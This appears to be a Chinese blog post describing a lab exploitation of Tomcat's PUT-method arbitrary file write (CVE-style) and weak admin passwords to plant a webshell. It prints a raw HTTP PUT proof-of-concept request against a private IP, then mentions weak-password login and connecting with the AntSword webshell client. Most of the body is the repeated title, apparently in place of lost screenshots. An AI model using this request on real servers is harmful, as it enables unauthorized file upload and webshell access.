tomcat put方法任意写文件漏洞、弱口令并进行挂马


tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

 

POC
直接发送以下数据包,然后将外壳程序写入Web根目录。

PUT /1.jsp/ HTTP/1.1

Host: 192.168.52.154:8080

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 5

 

shell

tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

 tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

通过弱口令漏洞进行登录

tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

 

 tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

 

通过蚁剑进行连接

tomcat put方法任意写文件漏洞、弱口令并进行挂马

 

 

连接成功

 

原创文章,作者:kirin,如若转载,请注明出处:https://blog.ytso.com/245522.html

(0)
上一篇 2022年4月18日
下一篇 2022年4月18日

相关推荐

发表回复

登录后才能评论